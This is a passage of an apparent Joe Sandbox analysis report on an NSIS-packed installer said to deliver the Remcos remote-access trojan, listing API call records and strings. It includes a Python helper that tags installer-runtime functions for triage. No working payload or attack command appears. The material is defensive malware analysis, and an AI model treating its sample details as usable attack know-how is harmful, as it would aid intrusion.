                                                          • GetModuleFileNameA.KERNEL32(00000000,00435C00,00000400), ref: 00402C93
                                                            • Part of subcall function 004059A2: GetFileAttributesA.KERNEL32(00000003,00402CA6,00435C00,80000000,00000003), ref: 004059A6
                                                            • Part of subcall function 004059A2: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
                                                          • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,00434C00,00434C00,00435C00,00435C00,80000000,00000003), ref: 00402CDF
                                                          Strings
                                                          • soft, xrefs: 00402D54
                                                          • Null, xrefs: 00402D5D
                                                          • Inst, xrefs: 00402D4B
                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E3E
                                                          • Error launching installer, xrefs: 00402CB6
                                                          Similarity
                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                          • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                          • API String ID: 4283519449-1074636621
                                                          • Opcode ID: 4eb7fdbfa3b6d290a18a6bc5ec9469a4ae157c267e60227b4c2036f25b06a2cd
                                                          • Instruction ID: 2dd8a40a4a6da4a25a7ff80ffc2ca296f3ca1cc65932c4217ff60142993c7b59
                                                          • Opcode Fuzzy Hash: 4eb7fdbfa3b6d290a18a6bc5ec9469a4ae157c267e60227b4c2036f25b06a2cd
                                                          • Instruction Fuzzy Hash: 9651F771940214ABDF20AF65DE89B9E7AA8EF04714F54803BF504B72D2C7BC9D418BAD
                                                          Similarity
                                                          • API ID: CountTick$wsprintf
                                                          • String ID: DA$ DA$... %d%%
                                                          • API String ID: 551687249-812340929
                                                          • Opcode ID: 94217b9421280a8461e3ee4b3a8dd366ffe4823102cebc53530c4dd28de20846
                                                          • Instruction ID: 91ee06cea14faca46f7a5a314d1b96781db6e884ff6161e1c143c8ea96f9570f
                                                          • Opcode Fuzzy Hash: 94217b9421280a8461e3ee4b3a8dd366ffe4823102cebc53530c4dd28de20846
                                                          • Instruction Fuzzy Hash: FB51907190120A9BDB10DF65EA44B9F7BB8EF44756F10813BE800B72C4D7788E51DBAA
                                                          APIs
                                                          • GetWindowLongA.USER32(?,000000EB), ref: 00403F98
                                                          • GetSysColor.USER32(00000000), ref: 00403FB4
                                                          • SetTextColor.GDI32(?,00000000), ref: 00403FC0
                                                          • SetBkMode.GDI32(?,?), ref: 00403FCC
                                                          • GetSysColor.USER32(?), ref: 00403FDF
                                                          • SetBkColor.GDI32(?,?), ref: 00403FEF
                                                          • DeleteObject.GDI32(?), ref: 00404009
                                                          • CreateBrushIndirect.GDI32(?), ref: 00404013
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                          • Instruction ID: f3431a0ddd372d44177634c3e6640760e16b4c563197d04d055afd4279a4596b
                                                          • Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                          • Instruction Fuzzy Hash: F4219F71808705ABCB209F78DD48A4BBBF8AF41704B048A2AE996F26E0C734E904CB55
                                                          APIs
                                                          • lstrlenA.KERNEL32(00429048,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                          • lstrlenA.KERNEL32(00402FFA,00429048,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                          • lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,?,759223A0), ref: 00404FA4
                                                          • SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                          • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                          • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                          • API String ID: 2531174081-0
                                                          • Opcode ID: 9e98d1af16aeab65ed7421f45f6da79edb9cc0a06014319387cc05644491ab37
                                                          • Instruction ID: 5247e829223e414f07dbea0a4ec6ac131d28d962b221907bbf4360a320382309
                                                          • Opcode Fuzzy Hash: 9e98d1af16aeab65ed7421f45f6da79edb9cc0a06014319387cc05644491ab37
                                                          • Instruction Fuzzy Hash: 76218C71D00118BBDF219FA5DC84ADEBFA9EF08354F10807AF904B6291C7798E408FA8
                                                          APIs
                                                          • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040482E
                                                          • GetMessagePos.USER32 ref: 00404836
                                                          • ScreenToClient.USER32(?,?), ref: 00404850
                                                          • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404862
                                                          • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404888
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                          • Instruction ID: 72a6dff9965abeea3fde93c43f55bc8d1d0b984f63b53e8c81f3052648e7bb03
                                                          • Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                          • Instruction Fuzzy Hash: EC019275D00218BADB00DBA5DC41FFEBBBCAF45711F10412BBB10B61C0C7B4A5018BA5
                                                          APIs
                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
                                                          • MulDiv.KERNEL32(?,00000064,?), ref: 00402BC5
                                                          • wsprintfA.USER32 ref: 00402BD5
                                                          • SetWindowTextA.USER32(?,?), ref: 00402BE5
                                                          • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF7
                                                          Strings
                                                          • verifying installer: %d%%, xrefs: 00402BCF
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: verifying installer: %d%%
                                                          • API String ID: 1451636040-82062127
                                                          • Opcode ID: f377c182e300eefdb83bb0ba9c57991093f425550345df3c4c3600326924e25d
                                                          • Instruction ID: f77185bba9c57e6aa61c0c8aee9f592e237af7c43fbef78eddb3d4185353df7a
                                                          • Opcode Fuzzy Hash: f377c182e300eefdb83bb0ba9c57991093f425550345df3c4c3600326924e25d
                                                          • Instruction Fuzzy Hash: D001F471640208BBEF209F60DD09EAE3779EB04744F008039FA16B51D1D7B5A955DB59
                                                          APIs
                                                          • CreateDirectoryA.KERNEL32(?,?,00435400), ref: 00405451
                                                          • GetLastError.KERNEL32 ref: 00405465
                                                          • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040547A
                                                          • GetLastError.KERNEL32 ref: 00405484
                                                          Similarity
                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                          • String ID: ds@$ts@
                                                          • API String ID: 3449924974-968229870
                                                          • Opcode ID: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                          • Instruction ID: 7d6f839e8d8492d35463ff02b487d6c5a8d89e3dbffb35ab490880a12e6152a5
                                                          • Opcode Fuzzy Hash: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                          • Instruction Fuzzy Hash: B4010871D14259EADF11DBA0C9447EFBFB8EB14355F004176E905B6280E378A644CFAA
                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406071
                                                          • wsprintfA.USER32 ref: 004060AA
                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 004060BE
                                                          Similarity
                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                          • String ID: %s%s.dll$UXTHEME$\
                                                          • API String ID: 2200240437-4240819195
                                                          • Opcode ID: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                          • Instruction ID: e3f146f71c0a6e9640e358317deb724d3a5625ccb5f8d81b259ee964bec3998a
                                                          • Opcode Fuzzy Hash: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                          • Instruction Fuzzy Hash: D0F0FC3095010566DB14DB74DD0DFEB375CAB08305F14017AA647E11D1D974F9248B69
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
                                                          • GlobalFree.KERNEL32(?), ref: 0040276F
                                                          • GlobalFree.KERNEL32(00000000), ref: 00402782
                                                          • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
                                                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE
                                                          Similarity
                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                          • String ID:
                                                          • API String ID: 2667972263-0
                                                          • Opcode ID: a3fe83495a6326a4d9725a4286933f11eb104b5d80c32fef7c5e56c283c101f8
                                                          • Instruction ID: 5d6717e5ef000630179c441ec4dabf90fe6e4dbd5b0bc7dedcefa97c90ee8361
                                                          • Opcode Fuzzy Hash: a3fe83495a6326a4d9725a4286933f11eb104b5d80c32fef7c5e56c283c101f8
                                                          • Instruction Fuzzy Hash: 1D215E71800124BBCF216FA5CE49EAE7E79EF09324F14423AF910762D1D7795D418FA9
                                                          APIs
                                                          • CharNextA.USER32(?,*?|<>/":,00000000,00434000,75923410,00435400,00000000,004030EA,00435400,00435400,004032FF), ref: 00405FF2
                                                          • CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
                                                          • CharNextA.USER32(?,00434000,75923410,00435400,00000000,004030EA,00435400,00435400,004032FF), ref: 00406004
                                                          • CharPrevA.USER32(?,?,75923410,00435400,00000000,004030EA,00435400,00435400,004032FF), ref: 00406014
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: *?|<>/":
                                                          • API String ID: 589700163-165019052
                                                          • Opcode ID: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                          • Instruction ID: 57e0f34d942670e43035b7c22e392f1a12bb14715b301cf1348a0c798ab9ef07
                                                          • Opcode Fuzzy Hash: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                          • Instruction Fuzzy Hash: 8B112751809B932AFB3256244C00B7BBFD88F57760F19007BE8D5722C2D67C5D529B6D
                                                          APIs
                                                          • lstrcatA.KERNEL32(00000000,00000000,00409410,00434800,00000000,00000000,00000031), ref: 00401790
                                                          • CompareFileTime.KERNEL32(-00000014,?,00409410,00409410,00000000,00000000,00409410,00434800,00000000,00000000,00000031), ref: 004017BA
                                                            • Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,0042DC00,NSIS Error), ref: 00405D3C
                                                            • Part of subcall function 00404F48: lstrlenA.KERNEL32(00429048,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                            • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,00429048,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                            • Part of subcall function 00404F48: lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,?,759223A0), ref: 00404FA4
                                                            • Part of subcall function 00404F48: SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
                                                            • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                            • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                            • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID:
                                                          • API String ID: 1941528284-0
                                                          • Opcode ID: dee7e85576095944788dec9a24ceabe04ca46bfab0ffc562e6d02ede3ec25bcf
                                                          • Instruction ID: 9fffb686f64fba45267de9fcbed8a5438fb589d34f2a074259106400a528bed4
                                                          • Opcode Fuzzy Hash: dee7e85576095944788dec9a24ceabe04ca46bfab0ffc562e6d02ede3ec25bcf
                                                          • Instruction Fuzzy Hash: 1041B831900519BBDF107BA5DC85EAF3679DF45368B60863BF121F11E1D63C8A418A6D
                                                          APIs
                                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A9B
                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402AE0
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402B05
                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
                                                          Similarity
                                                          • API ID: Close$DeleteEnumOpen
                                                          • String ID:
                                                          • API String ID: 1912718029-0
                                                          • Opcode ID: 7766ad722bcf743109a83c91df0766a7f4c549130a1e07b93abaa864288c9da4
                                                          • Instruction ID: e0b40e6d550d0c6dedecb0be42375ee7245bd63e637183e656586a56a8cfacd8
                                                          • Opcode Fuzzy Hash: 7766ad722bcf743109a83c91df0766a7f4c549130a1e07b93abaa864288c9da4
                                                          • Instruction Fuzzy Hash: 66116D31A00108FEDF22AF90DE89EAA3B7DEB54349B104436FA01B10E0D774AE51DB69
                                                          APIs
                                                          • GetDlgItem.USER32(?), ref: 00401CE2
                                                          • GetClientRect.USER32(00000000,?), ref: 00401CEF
                                                          • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
                                                          • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                          • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          • Opcode ID: 9768b6d74fcf23e80bc6e427cc8127c9000c17fceaf4ea3bd4d9c813d1582257
                                                          • Instruction ID: 718a49c372d49eeeb619100b459207f1cde729867d9d835a9e14b5832590348d
                                                          • Opcode Fuzzy Hash: 9768b6d74fcf23e80bc6e427cc8127c9000c17fceaf4ea3bd4d9c813d1582257
                                                          • Instruction Fuzzy Hash: 74F0E7B2A04114AFEB01EBE4DE88DAFB7BDEB54305B10447AF602F6191C7749D018B79
                                                          APIs
                                                          • GetDC.USER32(?), ref: 00401D3B
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
                                                          • ReleaseDC.USER32(?,00000000), ref: 00401D68
                                                          • CreateFontIndirectA.GDI32(0040A818), ref: 00401DB3
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                          • String ID:
                                                          • API String ID: 3808545654-0
                                                          • Opcode ID: 85ae1f3b485fc580be1612018afac6a4bfccfcdebcc445807fec339b6c5930a3
                                                          • Instruction ID: ad7d238852a8d87b5aaa3e6a204337ae93e1cce4a0b470fbec170e72a625d374
                                                          • Opcode Fuzzy Hash: 85ae1f3b485fc580be1612018afac6a4bfccfcdebcc445807fec339b6c5930a3
                                                          • Instruction Fuzzy Hash: EA01D632944340AFEB0177B0AE4EBAA3FB49759309F108479F201B62E2C6790052CF6F
                                                          APIs
                                                          • lstrlenA.KERNEL32(00429868,00429868,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
                                                          • wsprintfA.USER32 ref: 004047AF
                                                          • SetDlgItemTextA.USER32(?,00429868), ref: 004047C2
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s
                                                          • API String ID: 3540041739-3551169577
                                                          • Opcode ID: 16f3989c610b79fd80df00fdf91904367b17a8de3b9fad0169c92171420f25a1
                                                          • Instruction ID: 053aaa49463ee093dad042f908cd6657d31450f6c5b0c7846562dfb37f065ee1
                                                          • Opcode Fuzzy Hash: 16f3989c610b79fd80df00fdf91904367b17a8de3b9fad0169c92171420f25a1
                                                          • Instruction Fuzzy Hash: 0E11E473A041283BDB0065A99C45EAF3288DB82374F254237FA25F71D1EA78CC1286A8
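The API sequences and strings in the records above belong to the NSIS installer runtime that wraps the sample, not to the RAT itself: "verifying installer: %d%%" is the NSIS CRC-check progress text, "NSIS Error" (passed to lstrcpynA in the subcall at 00405D2F) is the stub's error dialog title, the list *?|<>/": checked with CharNextA/CharPrevA is its set of characters not allowed in file names, and the GetSystemDirectoryA / wsprintfA("%s%s.dll") / LoadLibraryExA(..., 00000008) sequence loads uxtheme.dll from the system directory with LOAD_WITH_ALTERED_SEARCH_PATH (0x8), so the stub does not pick up a planted DLL from the directory it was started in. The script below is an added example, not Joe Sandbox tooling: it parses records in this text layout, tags those matching NSIS stub patterns, and returns the untagged ones as the places where analyst attention should go. RECORDS is constructed from three of this report's own records; the tag rules are assumptions drawn from well-known NSIS runtime strings and call patterns, not a Joe Sandbox signature.

```python
"""Triage helper for Joe Sandbox per-function records (the "APIs", "Strings" and
"String ID" lines): parse each record, tag the ones whose API sequence and
strings match the NSIS installer runtime, and leave the rest as payload
candidates. Added example, not Joe Sandbox tooling; RECORDS is constructed from
three of the report's records and the NSIS rules are assumptions."""
import re
from dataclasses import dataclass, field

RECORDS = """\
APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
• wsprintfA.USER32 ref: 00402BD5
• SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF7
Strings
• verifying installer: %d%%, xrefs: 00402BCF
Similarity
• String ID: verifying installer: %d%%
APIs
• GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406071
• wsprintfA.USER32 ref: 004060AA
• LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 004060BE
Similarity
• String ID: %s%s.dll$UXTHEME$\\
APIs
• RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A9B
• RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
• RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
Similarity
• String ID:
"""

# "Name.MODULE(args), ref: ADDR" or "Name.MODULE ref: ADDR"; subcall lines carry a prefix.
API_RE = re.compile(r"^(?:Part of subcall function [0-9A-F]{8}: )?"
                    r"(\w+)\.(\w+)(?:\((.*)\))?,? ref: ([0-9A-F]{8})$")
LOAD_WITH_ALTERED_SEARCH_PATH = 0x8  # dwFlags bit of LoadLibraryEx

@dataclass
class FuncRecord:
    apis: list = field(default_factory=list)     # (name, module, args, ref), direct calls only
    strings: list = field(default_factory=list)  # from "Strings" and "String ID"
    tags: list = field(default_factory=list)
    @property
    def first_ref(self):
        return min(a[3] for a in self.apis) if self.apis else None
    @property
    def api_names(self):
        return {a[0] for a in self.apis}

def parse_records(text):
    records, section, cur = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in ("APIs", "Strings", "Similarity", "Memory Dump Source"):
            if line == "APIs":            # every record starts with its API list
                cur = FuncRecord()
                records.append(cur)
            section = line
        elif cur is not None and line.startswith("•"):
            body = line[1:].strip()
            if section == "APIs":
                m = API_RE.match(body)
                if m and not body.startswith("Part of subcall"):
                    name, module, args, ref = m.groups()
                    cur.apis.append((name, module, tuple(args.split(",")) if args else (), ref))
            elif section == "Strings":
                cur.strings.append(body.split(", xrefs:")[0])
            elif section == "Similarity" and body.startswith("String ID:"):
                for s in body[len("String ID:"):].strip().split("$"):
                    if s and s not in cur.strings:
                        cur.strings.append(s)
    return records

def system_dll_load_is_safe(rec):
    """True when the DLL path comes from GetSystemDirectoryA and LoadLibraryExA
    uses LOAD_WITH_ALTERED_SEARCH_PATH, i.e. the default search order that
    starts in the installer's own directory is bypassed (DLL hijacking check)."""
    if "GetSystemDirectoryA" not in rec.api_names:
        return False
    return any(name == "LoadLibraryExA" and len(args) >= 3 and args[2] != "?"
               and int(args[2], 16) & LOAD_WITH_ALTERED_SEARCH_PATH
               for name, _, args, _ in rec.apis)

# (tag, predicate). Assumed NSIS stub markers, not a Joe Sandbox signature.
NSIS_RULES = [
    ("nsis:crc-check-progress",      lambda r: any("verifying installer" in s for s in r.strings)),
    ("nsis:load-system-library",     lambda r: "%s%s.dll" in r.strings and "LoadLibraryExA" in r.api_names),
    ("nsis:filename-char-check",     lambda r: '*?|<>/":' in r.strings and "CharNextA" in r.api_names),
    ("nsis:recursive-regkey-delete", lambda r: {"RegOpenKeyExA", "RegEnumKeyA", "RegDeleteKeyA"} <= r.api_names),
]

def triage(text):
    recs = parse_records(text)
    for rec in recs:
        rec.tags = [tag for tag, hit in NSIS_RULES if hit(rec)]
    return recs

def payload_candidates(recs):
    """Records with no installer tag: where analyst attention should go first."""
    return [r for r in recs if not r.tags]
```

Run against the full report text, the untagged records are the ones worth reversing; for this sample the stub functions all tag as NSIS, which matches the report's own finding that the Remcos payload is written into a foreign process rather than living in this image.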
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FBB
                                                            • Part of subcall function 00404F48: lstrlenA.KERNEL32(00429048,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                            • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,00429048,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                            • Part of subcall function 00404F48: lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,?,759223A0), ref: 00404FA4
                                                            • Part of subcall function 00404F48: SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
                                                            • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                            • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                            • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                          • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
                                                          • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402045
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 2987980305-0
                                                          • Opcode ID: 500f6e3a65a5d06cc6fd84bae173ca6585055f773e93e28952c5af94c5a9b7f5
                                                          • Instruction ID: 2138191ccfc75e686ed6e38fe7ddd30e16a5f0053d2c4fe6557c99b01bfc6870
                                                          • Opcode Fuzzy Hash: 500f6e3a65a5d06cc6fd84bae173ca6585055f773e93e28952c5af94c5a9b7f5
                                                          • Instruction Fuzzy Hash: 58212B72904211EBDF217F658E4CAAE3671AB45318F30423BF701B62D0D7BC4946D66E
                                                          APIs
                                                          • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
                                                          • lstrlenA.KERNEL32(00409C10,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
                                                          • RegSetValueExA.ADVAPI32(?,?,?,?,00409C10,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023FB
                                                          • RegCloseKey.ADVAPI32(?,?,?,00409C10,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateValuelstrlen
                                                          • String ID:
                                                          • API String ID: 1356686001-0
                                                          • Opcode ID: 6bfc22de132d475452a3eabde2148332892c12b2c98957e8bf485f67369ac355
                                                          • Instruction ID: f509f4240a3e10e7eaa3df5a693eb391f4e90e3bb863c7dbc5285fb3648b227d
                                                          • Opcode Fuzzy Hash: 6bfc22de132d475452a3eabde2148332892c12b2c98957e8bf485f67369ac355
                                                          • Instruction Fuzzy Hash: 6B117571E00108BFEB10EBA5DE89EAF767DEB54358F10403AF605B71D1D6B85D419B28
                                                          APIs
                                                          • DestroyWindow.USER32(?,00000000,00402DE2,00000001), ref: 00402C15
                                                          • GetTickCount.KERNEL32 ref: 00402C33
                                                          • CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C50
                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402C5E
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                          • String ID:
                                                          • API String ID: 2102729457-0
                                                          • Opcode ID: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
                                                          • Instruction ID: 1b84634240e2166e3851fbc92cd381e461e1db94d3428fd6ef6110bf0b183a31
                                                          • Opcode Fuzzy Hash: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
                                                          • Instruction Fuzzy Hash: 97F05E30A09220EFD6317B20FE4CD9F7BA4BB04B15B404976F104B11EAC7782882CB9D
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 00404EEB
                                                          • CallWindowProcA.USER32(?,?,?,?), ref: 00404F3C
                                                            • Part of subcall function 00403F60: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403F72
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          • Opcode ID: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
                                                          • Instruction ID: 2a78fc1f4cbdadc5126368fc20cebde0bfb6f5e986cb98bc8d814c8ad8ef1b08
                                                          • Opcode Fuzzy Hash: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
                                                          • Instruction Fuzzy Hash: 6D01F7B150420AAFEF20AF51DE80A5B3766E7C4751F284037FB00762D0C3799C51966D
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 004059E5
                                                          • GetTempFileNameA.KERNEL32(?,?,00000000,?), ref: 004059FF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
